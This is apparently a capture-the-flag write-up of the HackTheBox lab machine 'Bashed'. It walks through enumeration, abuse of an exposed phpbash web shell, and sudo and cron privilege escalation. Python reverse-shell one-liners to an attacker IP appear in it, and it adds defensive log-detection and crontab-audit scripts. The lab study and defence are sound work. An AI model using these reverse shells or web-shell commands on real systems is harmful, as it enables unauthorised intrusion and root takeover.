Enumeration
NMAP
Using the lazy *-A* option (aggressive scan: version detection, OS detection, default scripts and traceroute) we discover port 80 open, running Apache 2.4.18 (Ubuntu).
# nmap -A 10.10.10.68
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-08 03:14 EDT
Nmap scan report for 10.10.10.68
Host is up (0.050s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
...[snipped]
Let's see what this website is about.

Dirbuster report
Of course, running a directory bruteforce is the next logical thing to do. It reveals a bunch of interesting directories and files:
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Thu Apr 08 03:25:09 EDT 2021
--------------------------------
http://10.10.10.68:80
--------------------------------
Directories found during testing:
Dirs found with a 200 response:
/
/css/
/dev/
/images/
/js/
/demo-images/
/php/
/uploads/
Dirs found with a 403 response:
/icons/
/icons/small/
--------------------------------
Files found during testing:
Files found with a 200 responce:
/dev/phpbash.min.php
/index.html
/single.html
/css/carouFredSel.css
/css/clear.css
/dev/phpbash.php
/css/common.css
/css/font-awesome.min.css
/css/sm-clean.css
/js/jquery.js
/js/imagesloaded.pkgd.js
/js/jquery.nicescroll.min.js
/js/jquery.smartmenus.min.js
/js/jquery.carouFredSel-6.0.0-packed.js
/js/jquery.mousewheel.min.js
/js/jquery.touchSwipe.min.js
/js/jquery.easing.1.3.js
/js/main.js
/js/custom_google_map_style.js
/js/html5.js
/config.php
/php/sendMail.php
The developer boasted on the site about a phpbash file he created on the platform. Let's see how we can use it to our advantage.
Burp Suite
I am going to try and see the contents of the file of interest.
Request
The file runs bash commands on the local host. Let’s cat our first flag 🙂
POST /dev/phpbash.min.php/ HTTP/1.1
Host: 10.10.10.68
Content-Length: 41
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Origin: http://10.10.10.68
Referer: http://10.10.10.68/dev/phpbash.min.php/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
cmd=cd /home/arrexel;pwd;ls;cat user.txt;
Response
HTTP/1.1 200 OK
Date: Thu, 08 Apr 2021 08:02:27 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 56
Connection: close
Content-Type: text/html; charset=UTF-8
/home/arrexel
user.txt
2c281f31<redacted>
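From the defender's side, the request above is what a web shell looks like in the Apache access log: repeated POSTs to a single PHP file under a directory such as /dev/ that has no business serving scripts. The following is an added example, not part of the original writeup, that runs this check over constructed combined-format log lines; the allowlist of legitimate POST handlers (/php/sendMail.php, found by DirBuster) and the suspicious directories are assumptions.

```python
import re
from collections import Counter

# Constructed Apache combined-format log lines for illustration (not the box's real logs).
SAMPLE_LOG = """\
10.10.14.6 - - [08/Apr/2021:08:01:12 +0000] "GET /dev/phpbash.min.php/ HTTP/1.1" 200 3212 "-" "Mozilla/5.0"
10.10.14.6 - - [08/Apr/2021:08:02:27 +0000] "POST /dev/phpbash.min.php/ HTTP/1.1" 200 56 "http://10.10.10.68/dev/phpbash.min.php/" "Mozilla/5.0"
10.10.14.6 - - [08/Apr/2021:08:02:31 +0000] "POST /dev/phpbash.min.php/ HTTP/1.1" 200 412 "http://10.10.10.68/dev/phpbash.min.php/" "Mozilla/5.0"
10.10.14.6 - - [08/Apr/2021:08:02:40 +0000] "POST /dev/phpbash.min.php/ HTTP/1.1" 200 88 "http://10.10.10.68/dev/phpbash.min.php/" "Mozilla/5.0"
192.168.1.20 - - [08/Apr/2021:09:00:00 +0000] "POST /php/sendMail.php HTTP/1.1" 200 12 "http://10.10.10.68/single.html" "Mozilla/5.0"
192.168.1.21 - - [08/Apr/2021:09:01:00 +0000] "GET /index.html HTTP/1.1" 200 9801 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Endpoints that legitimately receive POSTs on this site (assumption: the contact form handler).
EXPECTED_POST_ENDPOINTS = {"/php/sendMail.php"}
# Directories that should never serve executable scripts at all (assumption).
SUSPICIOUS_DIRS = ("/dev/", "/uploads/")

def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_webshell_candidates(log_text, min_posts=2):
    """Return {(ip, path): count} for POSTs to PHP scripts that are not known form handlers."""
    posts = Counter()
    for line in log_text.splitlines():
        rec = parse(line)
        if not rec or rec["method"] != "POST":
            continue
        # Drop the query string and the trailing slash used in the request on this box.
        path = rec["path"].split("?", 1)[0].rstrip("/")
        if ".php" not in path or path in EXPECTED_POST_ENDPOINTS:
            continue
        posts[(rec["ip"], path)] += 1
    # A script in a suspicious directory is reported at once; elsewhere we require repetition.
    return {k: n for k, n in posts.items() if n >= min_posts or k[1].startswith(SUSPICIOUS_DIRS)}
```

Note that the default Apache log format does not record the POST body, so the `cmd=` parameter itself is invisible here; the path and request pattern are what you get to alert on.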
Let’s see how we can escalate our privileges and gain root.
Firstly, let’s get reverse shell:
- change ATTACKING-IP and the port (80 here) to your listener
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Result:

Let's upgrade our shell to make it more usable:
- Spawn a better shell: python3 -c 'import pty;pty.spawn("/bin/bash")'
- Get access to terminal commands: export TERM=xterm
- Background the shell with Ctrl+Z, then turn on autocomplete etc. by typing in the original terminal: stty raw -echo; fg
Privilege Escalation
- Ran LinEnum.sh locally but nothing really was of interest.
- Looked for SGID/SUID files.
- Finally, looked into sudoers and received the following output:
$ sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
It seems we (www-data) can run commands as user scriptmanager, since no password is required.
$ sudo -u scriptmanager whoami
scriptmanager
To become user scriptmanager we type in:
sudo -u scriptmanager /bin/bash -i
Let's enumerate further. What does this user own or have access to?
scriptmanager@bashed:/$ find / -type f -user scriptmanager 2>/dev/null
/scripts/test.py
/home/scriptmanager/.profile
/home/scriptmanager/.bashrc
/home/scriptmanager/.selected_editor
/home/scriptmanager/.bash_history
/home/scriptmanager/.bash_logout
The only thing it owns outside its home directory is /scripts/test.py.
scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close()
It opens test.txt and writes a string into it, hmm. Who owns test.txt?
scriptmanager@bashed:/scripts$ ll
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Apr 8 03:19 ./
drwxr-xr-x 23 root root 4096 Dec 4 2017 ../
-rw-r--r-- 1 scriptmanager scriptmanager 282 Apr 8 03:19 test.py
-rw-r--r-- 1 root root 12 Apr 8 03:03 test.txt
test.txt is owned by root even though test.py belongs to scriptmanager, so whatever runs test.py (most likely a cron job) does so as root. Perhaps the scheduler runs everything in this folder as root. Let's add sauce: replace the contents of test.py with a python reverse shell.
scriptmanager@bashed:/scripts$ cat test.py
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.6",5555))  # change this to your listener
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
This results in a reverse shell as root:
# nc -lnvp 5555
listening on [any] 1337 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.68] 50176
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/root.txt
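The root cause of this escalation is a scheduled root job executing scripts from a directory owned by an unprivileged account. The following is an added audit script, not part of the original writeup, that parses system crontab lines and flags root jobs whose referenced path, or its parent directory, is owned by a non-root user or writable by group/others. The sample crontab and file ownership table are constructed to mirror the /scripts listing above; the box's real crontab is not shown on this page.

```python
import os
import pwd
import re
import stat
from collections import namedtuple

FileInfo = namedtuple("FileInfo", "owner mode")  # mode = permission bits only, e.g. 0o774
# System crontab line: five schedule fields, then the user, then the command.
CRON_LINE_RE = re.compile(r"^(\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

def stat_lookup(path):
    # Live lookup for use on a real host; None if the path does not exist.
    try:
        st = os.stat(path)
    except OSError:
        return None
    return FileInfo(pwd.getpwuid(st.st_uid).pw_name, stat.S_IMODE(st.st_mode))

def is_weak(info):
    # A non-root owner can rewrite the file; group/other write bits let others do the same.
    return info.owner != "root" or bool(info.mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_crontab(crontab_text, lookup=stat_lookup):
    """Return [(command, path, detail)] for root jobs whose path or its parent dir is weakly owned."""
    findings = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or an environment assignment such as SHELL=
        m = CRON_LINE_RE.match(line)
        if not m or m.group("user") != "root":
            continue
        cmd = m.group("cmd")
        for tok in (t.strip("\"';") for t in cmd.split() if t.startswith("/")):
            for path in (tok, os.path.dirname(tok)):
                info = lookup(path)
                if info and is_weak(info):
                    findings.append((cmd, path, f"owner={info.owner} mode={oct(info.mode)}"))
    return findings

# Constructed sample modelled on the /scripts listing above; not the box's real crontab.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
* * * * * root cd /scripts && for f in *.py; do python "$f"; done
0 3 * * * root /usr/local/bin/backup.sh
"""
SAMPLE_FILES = {
    "/scripts": FileInfo("scriptmanager", 0o774),  # drwxrwxr-- scriptmanager, as in the listing
    "/usr/local/bin": FileInfo("root", 0o755),
    "/usr/local/bin/backup.sh": FileInfo("root", 0o755),
}
```

On a live host, call `audit_crontab(open("/etc/crontab").read())` and repeat over the files in /etc/cron.d; the fix for a finding is to make the directory and scripts root-owned and not group/world writable.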